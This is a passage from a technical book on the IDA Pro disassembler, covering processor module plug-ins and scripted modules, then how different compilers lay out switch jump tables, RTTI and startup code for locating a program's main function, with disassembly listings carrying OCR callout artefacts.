op_t op2 = cmd.Op2;

cmd.Op1 = op2;

cmd.Op2 = op1;

\ (*ph.u_out)();

cmd.Op1 = op1;

cmd.Op2 = op2;

return 2;

}

return 0;

}

IDA Processor Modules 409

plugin_t PLUGIN = {

IDP_INTERFACE_VERSION,

] PLUGIN_PROC | PLUGIN_HIDE | PLUGIN_MOD, // plugin flags

init, // initialize

term, // terminate. this pointer may be NULL.

run, // invoke plugin

comment, // long comment about the plugin

help, // multiline help about the plugin

wanted_name, // the preferred short name of the plugin

wanted_hotkey // the preferred hotkey to run the plugin

};

The plug-in’s init function verifies that the current processor is the x86

processor X and then hooks processor notifications Y. In the callback hook

function, the plug-in processes the custom_out notification to recognize the

leave instruction Z and generates an alternative output line [. For two

operand instructions, the hook function temporarily saves the operands asso-

ciated with the current command, before swapping them within the com-

mand just prior to invoking the x86 processor’s u_out function \ to handle

all of the details of printing the line. Upon return, the command’s operands

are swapped back to their original order. Finally, the plug-in’s flags ] specify

that the plug-in should be loaded when a processor is loaded, should not be

listed on the EditPlugins menu, and modifies the database. The following

output shows the effects of the customizations performed by the plug-in:

.text:00401350 push ebp

^.text:00401351 mov 400000h, edx

.text:00401356 mov esp, ebp

^ .text:00401358 mov offset unk_402060, eax

^ .text:0040135D sub 0Ch, esp

.text:00401360 mov edx, [esp+8]

.text:00401364 mov eax, [esp+4]

^ .text:00401368 mov offset unk_402060, [esp]

.text:0040136F call sub_401320

_ .text:00401374 cya

.text:00401375 retn

You can observe the plug-in’s effects by noting that constants appear as

the first operand in four instructions ^ and that the cya instruction is used in

place of the leave instruction _.

In Chapter 21, we will look at using a custom processor plug-in to aid in

the analysis of certain types of obfuscated binaries.

Processor Module Architecture

As you set about designing processor modules, one of the things you will

need to consider is whether the processor will be closely coupled with a spe-

cific loader or can be decoupled from all loaders. For example, consider the

x86 processor module. This module makes no assumptions about the type of

410 Chapter 19

file that is being disassembled. Therefore, it is easily incorporated and used in

conjunction with a wide variety of loaders such as the PE, ELF, and Mach-O

loaders.

In a similar manner, loaders show versatility when they are capable of

handling a file format independently of the processor used with the file. For

example, the PE loader works equally well whether it contains x86 code or

ARM code; the ELF loader works equally well whether it contains x86, MIPS,

or SPARC code; and the Mach-O loader works fine whether it contains PPC

or x86 code.

Real-world CPUs lend themselves to the creation of processor modules

that do not rely on a specific input file format. Virtual machine languages, on

the other hand, pose a much larger challenge. Whereas a wide variety of

loaders (such as ELF, a.out, and PE) may be used to load code for execution

on native hardware, a virtual machine typically acts as both a loader and a

CPU. The net result is that, for virtual machines, both the file format and the

underlying byte code are intimately related. One cannot exist without the

other. We bumped up against this limitation several times in the develop-

ment of the Python processor module. In many cases, it simply was not possi-

ble to generate more readable output without a deeper understanding of the

structure of the file being disassembled.

In order for the Python processor to have access to the additional infor-

mation that it requires, we could build a Python loader that configures the

database in a manner very specific to the Python processor so that the Python

processor knows exactly where to find the information it needs. In this sce-

nario, a significant amount of loader state data would need to pass from the

loader to the processor. One approach is to store such data in database net-

nodes, where that data could later be retrieved by the processor module.

An alternative approach is to build a loader that does nothing other than

recognize .pyc files and then tells the processor module that it should handle

all of the other loading tasks, in which case the processor will surely know

how to locate all of the information needed for disassembling the .pyc file.

IDA facilitates the construction of tightly coupled loaders and processor

modules by allowing a loader to defer all loading operations to an associated

processor module. This is how the SDK’s included Java loader and Java pro-

cessor are constructed. In order for a loader to defer loading to the proces-

sor module, the loader should first accept a file by returning a file type of

f_LOADER (defined in ida.hpp). If the loader is selected by the user, the loader’s

load_file function should ensure that the proper processor type has been

specified by calling set_processor_type (idp.hpp) if necessary before sending a

loader-notification message to the processor. To build a tightly coupled

Python loader/processor combination, we might build a loader with the fol-

lowing load_file function:

void idaapi load_file(linput_t *li, ushort neflag, const char *) {

if (ph.id != PLFM_PYTHON) { //shared processor ID

set_processor_type("python", SETPROC_ALL|SETPROC_FATAL);

}

//tell the python processor module to do the loading for us

IDA Processor Modules 411

//by sending the processor_t::loader notification message

if (ph.notify(processor_t::loader, li, neflag)) {

error("Python processor/loader failed");

}

When the processor module receives the loader notification, it takes

responsibility for mapping the input file into the database and making sure

that it has access to any information that will be required in any of the ana,

emu, and out stages. A Python loader and processor combination that operates

in this manner is available on the book’s companion website.

Scripting a Processor Module

Introduced in IDA 5.7, the capability to create processor modules using one

of IDA’s scripting languages somewhat simplifies the creation of processor

modules. If nothing else, it completely eliminates the build phase of module

creation. Elias Bachaalany of Hex-Rays introduced scripted processor mod-

ules in a post on Hex Blog5 and IDA’s EFI bytecode processor module is

implemented as a Python script (see <IDADIR>/procs/ebc.py). Note that while

the Hex Blog post serves as useful background, the actual API used for script-

ing processor modules seems to have evolved. The best place for you to start

development of your own processor module script is with the template mod-

ule that ships with the SDK (see <SDKDIR>/module/script/proctemplate.py).

Among other things, this template enumerates all of the fields required in

a Python processor module.

Scripted processor modules make use of nearly all elements discussed

previously. Understanding these elements will ease your transition to scripted

modules. Additionally, the three Python processor modules that currently

ship with IDA (as of IDA 6.1) serve as excellent examples from which to

begin your own module development. The structure of these two modules

is a bit easier to understand than the C++ examples that ship with the SDK,

which span several files and require you to correctly configure a build

environment.

From a very high level, two things are required to implement a processor

module in Python:

zDefine a subclass idaapi.processor_t, providing implementations for all

required processor module functions such as emu, ana, out, and outop.

zDefine a PROCESSOR_ENTRY function (not a member of your subclass) that

returns an instance of your processor class.

The following listing begins to outline some of the required elements:

from idaapi import *

class demo_processor_t(idaapi.processor_t):

# Initialize required processor data fields including id and

5. See http://www.hexblog.com/?p=116.

412 Chapter 19

# assembler and many others. The assembler field is a dictionary

# containing keys for all of the fields of an asm_t. A list of

# instructions named instruc is also required. Each item in the list

# is a two-element dictionary containing name and feature keys.

# Also define functions required by processor_t such as those below.

def ana(self):

# analyzer behavior

def emu(self):

# emulator behavior

def out(self):

# outputter behavior

def outop(self):

# outop behavior

# define the processor entry point function which instantiates

# and returns an instance of processor_t

def PROCESSOR_ENTRY():

return demo_processor_t()

A valid Python processor module contains far more fields and functions

than shown above, essentially mirroring the fields required in any processor

module implemented in C++. Once your script is complete, installation of

your module is accomplished by copying your script to <IDADIR>/procs.

Summary

As the most complex of IDA’s modular extensions, processor modules take

time to learn and even more time to create, although the use of scripting can

ease this pain to some extent. However, if you are in a niche reverse engineer-

ing market, or you simply like to be on the leading edge of the reverse engi-

neering community, you will almost certainly find yourself with the need to

develop a processor module at some point. We cannot emphasize enough

the role that patience and trial and error play in any processor-development

situation. The hard work more than pays off when you are able to reuse your

processor module with each new binary you collect.

With the end of this chapter, we conclude our discussion of IDA’s exten-

sibility features. Over the course of the next several chapters, we will discuss

many of the ways IDA is used in real-world scenarios and look at how users

have leveraged IDA extensions to perform a variety of interesting analysis

tasks.

PART V

REAL-WORLD APPLICATIONS

JMP

EBP

SUB

COMPILER PERSONALITIES

At this point, if we have done our job

properly, you now possess the essential skills

to use IDA effectively and, more important,

to bend it to your will. The next step, young

grasshopper, is to learn to react to the ninja stars

that binaries (as opposed to IDA) will throw at you.

Depending on your motives for staring at assembly language, you may be

very familiar with what you are looking at, or you may never know what you

are going to be faced with. If you happen to spend all of your time examining

code that was compiled using gcc on a Linux platform, you may become quite

familiar with the style of code that it generates. On the other hand, if some-

one dropped a debug version of a program compiled using Microsoft Visual

C++ (VC++) in your lap, you might be completely baffled. Malware analysts in

particular are faced with a wide variety of code to examine. Setting aside the

topic of obfuscation for the moment, malware analysts are likely to see code

created using Visual Basic, Delphi, and Visual C/C++; machine language

blobs embedded within documents; and more all in the same afternoon.

416 Chapter 20

In this chapter we will take a brief look at some of the ways that compilers

differ as viewed through the IDA looking glass. The intent is not to delve

into why compilers differ; rather, we hope to cover some of the ways that those

differences manifest themselves in disassembly listings and how you may

resolve those differences. Among other things, the compiler and associated

options used to build a particular piece of software constitute one data point

in profiling the author of that software.

While a wide variety of compilers are available for a wide variety of lan-

guages, in this chapter we will primarily utilize compiled C code for our

examples, as a large number of C compilers are available for a large number

of platforms.

Jump Tables and Switch Statements

The C switch statement is a frequent target for compiler optimizations. The

goal of these optimizations is to match the switch variable to a valid case label

in the most efficient manner possible. The means by which this is achieved

typically depends on the nature of the switch statement’s case labels. When

the case labels are widely spread, as in the following example, most compilers

generate code to perform a binary search1 to match the switch variable against

one of the cases.

switch (value) {

case 1:

//code executed when value == 1

break;

case 211:

//code executed when value == 211

break;

case 295:

//code executed when value == 295

break;

case 462:

//code executed when value == 462

break;

case 1093:

//code executed when value == 1093

break;

case 1839:

//code executed when value == 1839

break;

}

When case labels are closely clustered, preferably sequentially as shown

here, compilers generally resolve the switch variable by performing a table

lookup2 to match the switch variable to the address of its associated case.

1. For you algorithmic analysis fans, this means that the switch variable is matched after at most

log2N operations, where N is the number of cases contained in the switch statement.

2. Again for those analyzing algorithms at home, the use of a table lookup allows the target case

to be found in a single operation, which you may recall from your algorithms class is also called

constant time or O(1).

Compiler Personalities 417

switch (value) {

case 1:

//code executed when value == 1

break;

case 2:

//code executed when value == 2

break;

case 3:

//code executed when value == 3

break;

case 4:

//code executed when value == 4

break;

case 5:

//code executed when value == 5

break;

case 6:

//code executed when value == 6

break;

}

A compiled example of a switch statement that matches the switch variable

against the consecutive cases 1 through 12 is shown here:

.text:00401155 mov edx, [ebp+arg_0]

X .text:00401158 cmp edx, 0Ch ; switch 13 cases

.text:0040115B ja \loc_4011F1 ; default

.text:0040115B ; jumptable 00401161 case 0

.text:00401161 jmp ds:off_401168[edx*4] ; switch jump

.text:00401161 ; ---------------------------------------------------------------

Y .text:00401168 off_401168 dd offset [loc_4011F1 ; DATA XREF: sub_401150+11Çr

.text:00401168 dd offset loc_40119C ; jump table for switch statement

.text:00401168 dd offset loc_4011A1

.text:00401168 dd offset loc_4011A6

.text:00401168 dd offset loc_4011AB

.text:00401168 dd offset loc_4011B3

.text:00401168 dd offset loc_4011BB

.text:00401168 dd offset loc_4011C3

.text:00401168 dd offset loc_4011CB

.text:00401168 dd offset loc_4011D3

.text:00401168 dd offset loc_4011DB

.text:00401168 dd offset loc_4011E3

.text:00401168 dd offset loc_4011EB

.text:0040119C ; ---------------------------------------------------------------

.text:0040119C

.text:0040119C loc_40119C: ; CODE XREF: sub_401150+11Çj

.text:0040119C ; DATA XREF: sub_401150:off_401168Ço

Z .text:0040119C mov eax, [ebp+arg_4] ; jumptable 00401161 case 1

418 Chapter 20

This example was compiled using the Borland command-line compiler,

which IDA well understands. The comments, which IDA inserted during the

analysis phase, demonstrate that IDA has a clear understanding that this is a

switch statement. In this example we note that IDA recognizes the switch

test X, the jump table Y, and individual cases by value Z within the code.

As a side note on the use of jump tables to resolve switch cases, note

that the table in the previous example contains 13 entries, while the switch

statement is known to test cases 1 through 12 only. In this case, the compiler

elected to include an entry for case 0 rather than treating 0 as a special case.

The destination for case 0 [ is the same as the destination for every other

value outside the range of 1 to 12 \.

A final implementation note concerns the nature of the test performed

on the switch variable. For readers less familiar with the x86 instruction set,

the test X and the associated jump in the succeeding line may appear only

to exclude values larger than 12 while failing to account for negative values.

If true, this could be disastrous, as using a negative index into the jump table

might lead to unintended consequences. Fortunately, the ja (jump above)

instruction treats comparisons as if they were performed on unsigned values;

thus -1 (0xFFFFFFFF) would be seen as 4294967295, which is much larger than 12

and therefore excluded from the valid range for indexing the jump table.

The same source code compiled using Microsoft Visual C++ results in the

disassembly listing shown here:

.text:004013D5 mov ecx, [ebp+var_8]

.text:004013D8 Xsub ecx, 1

.text:004013DB mov [ebp+var_8], ecx

.text:004013DE cmp [ebp+var_8], Y0Bh ; switch 12 cases

.text:004013E2 ja loc_40146E ; jumptable 004013EB default case

.text:004013E8 mov edx, [ebp+var_8]

.text:004013EB jmp ds:off_401478[edx*4] ; switch jump

.text:004013F2

[.text:004013F2 loc_4013F2: ; DATA XREF:

.text:off_401478?o

.text:004013F2 mov eax, [ebp+arg_4] ; jumptable 004013EB \case 0

... ; REMAINDER OF FUNCTION EXCLUDED FOR BREVITY

.text:00401477 retn

.text:00401477 sub_4013B0 endp

.text:00401477 ; -------------------------------------------------------------

Z.text:00401478 off_401478 dd offset [loc_4013F2 ; DATA XREF: sub_4013B0+3BÈr

.text:00401478 dd offset loc_4013FA ; jump table for switch statement

.text:00401478 dd offset loc_401402

.text:00401478 dd offset loc_40140A

.text:00401478 dd offset loc_401415

.text:00401478 dd offset loc_401420

.text:00401478 dd offset loc_40142B

.text:00401478 dd offset loc_401436

.text:00401478 dd offset loc_401441

.text:00401478 dd offset loc_40144C

.text:00401478 dd offset loc_401458

.text:00401478 dd offset loc_401464

Compiler Personalities 419

Several differences are apparent when comparing this code with the

code generated by the Borland compiler. One obvious difference is that the

jump table has been relocated to space immediately following the function

containing the switch statement (as opposed to being embedded within the

function itself in the case of the Borland code). Other than providing a

cleaner separation of code and data, relocating the jump table in this man-

ner has little effect on the behavior of the program. Despite the different lay-

out of the code, IDA remains capable of annotating the key features of the

switch statement, including the number of cases and the code blocks associ-

ated with each case.

A few of the implementation details of the switch statement include the

fact that the switch variable (var_8 in this case) is decremented X to shift

the range of valid values to 0 through 11 Y, allowing the variable to be

used directly as an index into the jump table Z without the need to create

a dummy slot for the unused case 0. As a result, the first entry (or zero index

entry) [ in the jump table actually refers to the code for switch case 1.

Rounding out our comparison of switch statements is the following code

generated by gcc:

.text:004011FA Xcmp [ebp+arg_0], 0Ch ; switch 13 cases

.text:004011FE ja Zloc_40129D ; jumptable 00401210 case 0

.text:00401204 mov eax, [ebp+arg_0]

.text:00401207 shl eax, 2

.text:0040120A \mov Yeax, ds:off_402010[eax]

.text:00401210 \jmp eax ; switch jump

.text:00401212

.text:00401212 [loc_401212: ; DATA XREF:

.rdata:off_402010 o

.text:00401212 mov eax, [ebp+arg_4] ; jumptable 00401210 case 1

... ; REMAINDER OF .text SECTION EXCLUDED FOR BREVITY

Y.rdata:00402010 off_402010 dd offset Zloc_40129D ; DATA XREF: sub_4011ED+1DÇr

.rdata:00402010 dd offset [loc_401212 ; jump table for switch statement

.rdata:00402010 dd offset loc_40121D

.rdata:00402010 dd offset loc_401225

.rdata:00402010 dd offset loc_40122D

.rdata:00402010 dd offset loc_40123C

.rdata:00402010 dd offset loc_40124B

.rdata:00402010 dd offset loc_40125A

.rdata:00402010 dd offset loc_401265

.rdata:00402010 dd offset loc_401270

.rdata:00402010 dd offset loc_40127B

.rdata:00402010 dd offset loc_401287

.rdata:00402010 dd offset loc_401293

This code bears some similarities to the Borland code as seen by the

comparison to 12 X, the jump table Y that contains 13 entries, and the use

of a pointer to the default case Z in the case 0 slot of the jump table. As in

the Borland code, the address for the case 1 handler [ can be found at

index 1 into the jump table. Notable differences between the gcc code and

previous examples include a different style of executing the jump \ and the

fact that the jump table is stored in the read-only data (.rdata) section of the

420 Chapter 20

binary, providing a logical separation between the code associated with the

switch statement and the data required to implement the switch statement.

As in the other two examples, IDA is able to locate and annotate the key ele-

ments of the switch statement.

One of the points we are making here is that there is no single correct

way to compile source to assembly. Familiarity with code generated by a spe-

cific compiler in no way guarantees that you will recognize high-level con-

structs compiled using an entirely different compiler (or even different

versions of the same compiler family). More important, do not assume that

something is not a switch statement simply because IDA fails to add comments

to that effect. Like you, IDA is more familiar with the output of some com-

pilers than others. Rather than relying entirely on IDA’s analysis capabilities

to recognize commonly used code and data constructs, you should always

be prepared to utilize your own skills—your familiarity with a given assembly

language, your knowledge of compilers, and your research skills—to properly

interpret a disassembly.

RTTI Implementations

In Chapter 8 we discussed C++ Runtime Type Identification (RTTI) and

the fact that no standard exists for the manner in which RTTI is implemented

by a compiler. Automatic recognition of RTTI-related constructs within a

binary is another area in which IDA’s capabilities vary across compilers. Not

surprisingly, IDA’s capabilities in this area are strongest with binaries compiled

using Borland compilers. Readers interested in automated recognition of

Microsoft RTTI data structures may want to try Igor Skochinsky’s IDC script

available at The IDA Palace3 or the Class Informer plug-in by Sirmabus,4

which will be discussed further in Chapter 23.

A simple strategy for understanding how a specific compiler embeds type

information for C++ classes is to write a basic program that makes use of

classes containing virtual functions. After compiling the program, you can

load the resulting executable into IDA and search for instances of strings

that contain the names of classes used in the program. Regardless of the

compiler used to build a binary, one thing that RTTI data structures have in

common is that they all contain a pointer to a string containing the name

of the class that they represent. Using data cross-references, it should be

possible to locate a pointer to one such string, thus locating candidate RTTI

data structures. The last step is to link a candidate RTTI structure back to

the associated class’s vtable, which is best accomplished by following data

cross-references backward from a candidate RTTI structure until a table of

function pointers (the vtable) is reached.

3. See http://old.idapalace.net/idc/ms_rtti.zip.

4. See http://www.openrce.org/blog/browse/Sirmabus.

Compiler Personalities 421

Locating main

If you were fortunate enough to have source code available for a C/C++ pro-

gram that you wanted to analyze, a good place to begin your analysis might

be the main function, as this is where execution notionally begins. When faced

with analyzing a binary, this is not a bad strategy to follow. However, as we

know, it is complicated by the fact that compilers/linkers (and the use of

libraries) add additional code that executes before main is reached. Thus it

would often be incorrect to assume that the entry point of a binary corre-

sponds to the main function written by the program’s author.

In fact, the notion that all programs have a main function is a C/C++

compiler convention rather than a hard-and-fast rule for writing programs. If

you have ever written a Windows GUI application, then you may be familiar

with the WinMain variation on main. Once you step away from C/C++, you will

find that other languages use other names for their primary entry-point

function. Regardless of what it may be called, we will refer to this function

generically as the main function.

Chapter 12 covered the concept of IDA signature files, their generation,

and their application. IDA utilizes special startup signatures to attempt to

identify a program’s main function. When IDA is able to match a binary’s

startup sequence against one of the startup sequences in its signature files,

IDA can locate a program’s main function based on its understanding of the

behavior of the matched startup routine. This works great until IDA fails to

match the startup sequence in a binary to any of its known signatures. In gen-

eral, a program’s startup code is closely tied to both the compiler used to

generate the code and the platform for which the code was built.

Recall from Chapter 12 that startup signatures are grouped together

and stored in signature files specific to binary file types. For example, startup

signatures for use with the PE loader are stored in pe.sig, while startup sig-

natures for use with the MS-DOS loader are stored in exe.sig. The existence of

a signature file for a given binary file type does not guarantee that IDA will be

able to identify a program’s main function 100 percent of the time. There are

too many compilers, and startup sequences are too much of a moving target

for IDA to ship with every possible signature.

For many file types, such as ELF and Mach-O, IDA does not include any

startup signatures at all. The net result is that IDA can’t use signatures to

locate a main function within an ELF binary (though the function will be found

if it is named main).

The point of this discussion is to prepare you for the fact that, on occasion,

you will be on your own when it comes to locating the main function of a pro-

gram. In such cases it is useful to have some strategies for understanding

how the program itself prepares for the call to main. As an example, consider

a binary that has been obfuscated to some degree. In this case, IDA will cer-

tainly fail to match a startup signature because the startup routine itself has

been obfuscated. If you manage to de-obfuscate the binary somehow (the

topic of Chapter 21), you will probably need to locate not only main on your

own but the original start routine as well.

422 Chapter 20

For C and C++ programs with a traditional main function,5 one of the

responsibilities of the startup code is to set up the stack arguments required

by main, the integer argc (a count of the number of command-line arguments),

the character pointer array argv (an array of pointers to strings containing the

command-line arguments), and the character pointer array envp (an array

of pointers to strings containing the environment variables that were set at

program invocation). The following excerpt from a FreeBSD 8.0 dynamically

linked, stripped binary demonstrates how gcc-generated startup code calls

to main on a FreeBSD system:

.text:08048365 mov dword ptr [esp], offset _term_proc ; func

.text:0804836C Ycall _atexit

.text:08048371 Zcall _init_proc

.text:08048376 lea eax, [ebp+arg_0]

.text:08048379 mov [esp+8], esi

.text:0804837D mov [esp+4], eax

.text:08048381 mov [esp], ebx

.text:08048384 Xcall sub_8048400

.text:08048389 \mov [esp], eax ; status

.text:0804838C [call _exit

In this case, the call to sub_8048400 X turns out to be the call to main.

This code is typical of many startup sequences in that there are calls to ini-

tialization functions (_atexit Y and _init_proc Z) preceding the call to main

and a call to _exit [ following the return from main. The call to _exit ensures

that the program terminates cleanly in the event that main performs a return

rather than calling _exit itself. Note that the parameter passed to _exit \ is

the value returned by main in EAX; thus the exit code of the program is the

return value of main.

If the previous program was statically linked and stripped, the start rou-

tine would have the same structure as the preceding example; however, none

of the library functions would have useful names. In that case, the main func-

tion would continue to stand out as the only function that is called with three

parameters. Of course, applying FLIRT signatures as early as possible would

also help to restore many of the library function names and make main stand

out, as it does in the preceding example.

In order to demonstrate that the same compiler may generate a com-

pletely different style of code when running on a different platform, consider

the following example, also created using gcc, of a dynamically linked,

stripped binary taken from a Linux system:

.text:080482B0 start proc near

.text:080482B0 xor ebp, ebp

.text:080482B2 pop esi

.text:080482B3 mov ecx, esp

.text:080482B5 and esp, 0FFFFFFF0h

5. Windows GUI applications require a WinMain function instead of main. Documentation

regarding WinMain can be found here: http://msdn2.microsoft.com/en-us/library/ms633559.aspx.

Compiler Personalities 423

.text:080482B8 push eax

.text:080482B9 push esp

.text:080482BA push edx

.text:080482BB Xpush offset sub_80483C0

.text:080482C0 Ypush offset sub_80483D0

.text:080482C5 push ecx

.text:080482C6 push esi

.text:080482C7 Zpush offset loc_8048384

.text:080482CC call ___libc_start_main

.text:080482D1 hlt

.text:080482D1 start endp

In this example, start makes a single function call to ___libc_start_main.

The purpose of ___libc_start_main is to perform all of the same types of tasks

that were performed in the preceding FreeBSD example, including calling

main and ultimately exit. Since ___libc_start_main is a library function, we

know that the only way it knows where main actually resides is that it is told

via one of its parameters (of which there appear to be eight). Clearly two

of the parameters X and Y are pointers to functions, while a third Z is a

pointer to a location within the .text section. There are few clues in the pre-

vious listing as to which function might be main, so you might need to analyze

the code at the three potential locations in order to correctly locate main.

This might be a useful exercise; however, you may prefer simply to remem-

ber that the first argument (topmost on the stack and therefore last pushed)

to ___libc_start_main is in fact a pointer to main. There are two factors that

combine to prevent IDA from identifying loc_8048384 as a function (which

would have been named sub_8048384). The first is that the function is never

called directly, so loc_8048384 never appears as the target of a call instruction.

The second is that although IDA contains heuristics to recognized functions

based on their prologues (which is why sub_80483C0 and sub_80483D0 are identi-

fied as functions even though they too are never called directly), the func-

tion at loc_8048384 (main) does not use a prologue recognized by IDA. The

offending prologue (with comments) is shown here:

.text:08048384 loc_8048384: ; DATA XREF: start+17Ço

.text:08048384 lea ecx, [esp+4] ; address of arg_0 into ecx

.text:08048388 and esp, 0FFFFFFF0h ; 16 byte align esp

.text:0804838B push dword ptr [ecx-4] ; push copy of return address

.text:0804838E Xpush ebp ; save caller's ebp

.text:0804838F Ymov ebp, esp ; initialize our frame pointer

.text:08048391 push ecx ; save ecx

.text:08048392 Zsub esp, 24h ; allocate locals

This prologue clearly contains the elements of a traditional prologue

for a function that uses EBP as a frame pointer. The caller’s frame pointer is

saved X before setting the frame pointer for the current function Y and

finally allocating space for local variables Z. The problem for IDA is that these

actions do not occur as the first actions within the function, and thus IDA’s

heuristics fail. It is a simple enough matter to manually create a function

(EditFunctionsCreate Function) at this point, but you should take care

424 Chapter 20

to monitor IDA’s behavior. Just as it failed to identify the function in the first

place, it may fail to recognize the fact that the function uses EBP as a frame

pointer. In such a case, you would need to edit the function (ALT-P) to force

IDA to believe that the function has a BP-based frame as well as to make adjust-

ments to the number of stack bytes dedicated to saved registers and local

variables.

As in the case of the FreeBSD binary, if the preceding Linux example

happened to be both statically linked and stripped, the start routine would

not change at all other than the fact that the name for ___libc_start_main

would be missing. You could still locate main by remembering that gcc’s Linux

start routine makes only one function call and that the first parameter to that

function is the address of main.

On the Windows side of the house, the number of C/C++ compilers

(and therefore the number of startup routines) in use is somewhat higher.

Perhaps not unsurprisingly, in the case of gcc on Windows, it is possible to

leverage some of the knowledge gained by studying gcc’s behavior on other

platforms. The startup routine shown here is from a gcc/Cygwin binary:

.text:00401000 start proc near

.text:00401000

.text:00401000 var_28 = dword ptr -28h

.text:00401000 var_24 = dword ptr -24h

.text:00401000 var_20 = dword ptr -20h

.text:00401000 var_2 = word ptr -2

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 sub esp, 28h

.text:00401006 and esp, 0FFFFFFF0h

.text:00401009 fnstcw [ebp+var_2]

.text:0040100C movzx eax, [ebp+var_2]

.text:00401010 and ax, 0F0C0h

.text:00401014 mov [ebp+var_2], ax

.text:00401018 movzx eax, [ebp+var_2]

.text:0040101C or ax, 33Fh

.text:00401020 mov [ebp+var_2], ax

.text:00401024 fldcw [ebp+var_2]

.text:00401027 Ymov [esp+28h+var_28], offset sub_4010B0

.text:0040102E Xcall sub_401120

Clearly this code does not map cleanly to the previous Linux-based

example. However, there is one striking similarity: only one function is

called X, and the function takes a function pointer for parameter Y. In

this case sub_401120 serves much the same purpose as ___libc_start_main,

while sub_4010B0 turns out to be the main function of the program.

Compiler Personalities 425

Windows binaries compiled using gcc/MinGW make use of yet another

style of start function, as shown here:

.text:00401280 start proc near

.text:00401280

.text:00401280 var_8 = dword ptr -8

.text:00401280

.text:00401280 push ebp

.text:00401281 mov ebp, esp

.text:00401283 sub esp, 8

.text:00401286 mov [esp+8+var_8], 1

.text:0040128D call ds:__set_app_type

.text:00401293 Xcall sub_401150

.text:00401293 start endp

This is another case in which IDA will fail to identify the program’s main

function. The preceding code offers few clues as to the location of main, as

there is only one nonlibrary function called X (sub_401150) and that function

does not appear to take any arguments (as main should). In this instance, the

best course of action is to continue the search for main within sub_401150. A

portion of sub_401150 is shown here:

.text:0040122A call __p__environ

.text:0040122F mov eax, [eax]

.text:00401231 [mov [esp+8], eax

.text:00401235 mov eax, ds:dword_404000

.text:0040123A Zmov [esp+4], eax

.text:0040123E mov eax, ds:dword_404004

.text:00401243 Ymov [esp], eax

.text:00401246 Xcall sub_401395

.text:0040124B mov ebx, eax

.text:0040124D call _cexit

.text:00401252 mov [esp], ebx

.text:00401255 call ExitProcess

In this example, the function turns out to have many similarities with the

start function associated with FreeBSD that we saw earlier. Process of elimi-

nation points to sub_401395 as the likely candidate for main, as it is the only

nonlibrary function that is called with three arguments—Y, Z, and [. Also,

the third argument [ is related to the return value of the __p__environ library

function, which correlates well with the fact that main’s third argument is

expected to be a pointer to the environment strings array. The example code

is also preceded by a call to the getmainargs library function (not shown), which

is called to set up the argc and argv parameters prior to actually calling main.

This helps to reinforce the notion that main is about to be called.

426 Chapter 20

The start routine for Visual C/C++ code is short and sweet, as seen here:

.text:0040134B start proc near

.text:0040134B call ___security_init_cookie

.text:00401350 jmp ___tmainCRTStartup

.text:00401350 start endp

IDA has actually recognized the library routines referenced in the two

instructions through the application of startup signatures rather than by

the fact that the program is linked to a dynamic library containing the given

symbols. IDA’s startup signatures provide easy location of the initial call to

main, as shown here:

.text:004012D8 mov eax, envp

.text:004012DD mov dword_40ACF4, eax

.text:004012E2 push eax ; envp

.text:004012E3 push argv ; argv

.text:004012E9 push argc ; argc

.text:004012EF Xcall _main

.text:004012F4 add esp, 0Ch

.text:004012F7 mov [ebp+var_1C], eax

.text:004012FA cmp [ebp+var_20], 0

.text:004012FE jnz short $LN35

.text:00401300 push eax ; uExitCode

.text:00401301 call $LN27

.text:00401306 $LN35: ; CODE XREF: ___tmainCRTStartup+169Èj

.text:00401306 call __cexit

.text:0040130B jmp short loc_40133B

Within the entire body of tmainCRTStartup, _main is the only function

called with exactly three arguments. Further analysis would reveal that the

call to _main is preceded by a call to the GetCommandLine library function, which

is yet another indication that a program’s main function may be called shortly.

As a final note concerning the use of startup signatures, it is important to

understand that, in this example, IDA has generated the name _main entirely

on its own as a result of matching a startup signature. The ASCII string main

appeared nowhere in the binary used in this example. Thus, you can expect

main to be found and labeled anytime a startup signature is matched, even

when a binary has been stripped of its symbols.

The last startup routine that we will examine for a C compiler is generated

by Borland’s free command-line compiler.6 The last few lines of Borland’s

start routine are shown here:

.text:00401041 Xpush offset off_4090B8

.text:00401046 push 0 ; lpModuleName

.text:00401048 call GetModuleHandleA

.text:0040104D mov dword_409117, eax

.text:00401052 push 0 ; fake return value

.text:00401054 jmp __startup

6. See http://forms.embarcadero.com/forms/BCC32CompilerDownload/.

Compiler Personalities 427

The pointer value pushed on the stack X refers to a structure that in

turn contains a pointer to main. Within __startup, the setup to call main is

shown here:

.text:00406997 mov edx, dword_40BBFC

.text:0040699D [push edx

.text:0040699E mov ecx, dword_40BBF8

.text:004069A4 Zpush ecx

.text:004069A5 mov eax, dword_40BBF4

.text:004069AA Ypush eax

.text:004069AB Xcall dword ptr [esi+18h]

.text:004069AE add esp, 0Ch

.text:004069B1 push eax ; status

.text:004069B2 call _exit

Again, this example bears many similarities to previous examples in that

the call to main X takes three arguments Y, Z, and [ (the only function

called within __startup to do so) and the return value is passed directly to

_exit to terminate the program. Additional analysis of __startup would reveal

calls to the Windows API functions GetEnvironmentStrings and GetCommandLine,

which are often precursors to the invocation of main.

Finally, in order to demonstrate that tracking down a program’s main

function is not a problem specific to C programs, consider the following

startup code from a compiled Visual Basic 6.0 program:

.text:004018A4 start:

.text:004018A4 Xpush offset dword_401994

.text:004018A9 call ThunRTMain

The ThunRTMain library function performs a function similar to the Linux

libc_start_main function in that its job is to perform any initialization required

prior to invoking the actual main function of the program. In order to transfer

control to the main function, Visual Basic utilizes a mechanism very similar to

that in the Borland code in the earlier examples. ThunRTMain takes a single

argument X, which is a pointer to a structure containing additional informa-

tion required for program initialization, including the address of the main

function. The content of this structure is shown here:

.text:00401994 dword_401994 dd 21354256h, 2A1FF0h, 3 dup(0) ; DATA XREF: .text:startÇo

.text:004019A8 dd 7Eh, 2 dup(0)

.text:004019B4 dd 0A0000h, 409h, 0

.text:004019C0 Xdd offset sub_4045D0

.text:004019C4 dd offset dword_401A1C

.text:004019C8 dd 30F012h, 0FFFFFF00h, 8, 2 dup(1), 0E9h, 401944h, 4018ECh

.text:004019C8 dd 4018B0h, 78h, 7Dh, 82h, 83h, 4 dup(0)

Within this data structure, there is only one item X that appears to ref-

erence code at all, the pointer to sub_4045D0, which turns out to be the main

function for the program.

428 Chapter 20

In the end, learning how to find main is a matter of understanding how

executable files are built. In cases where you are experiencing difficulties, it

may be beneficial to build some simple executables (with a reference to an

easily identifiable string in main, for example) with the same tools used to

build the binary you are analyzing. By studying your test cases, you will gain

an understanding of the basic structure of binaries built using a specific set

of tools that may assist you in further analyzing more complex binaries built

with the same set of tools.

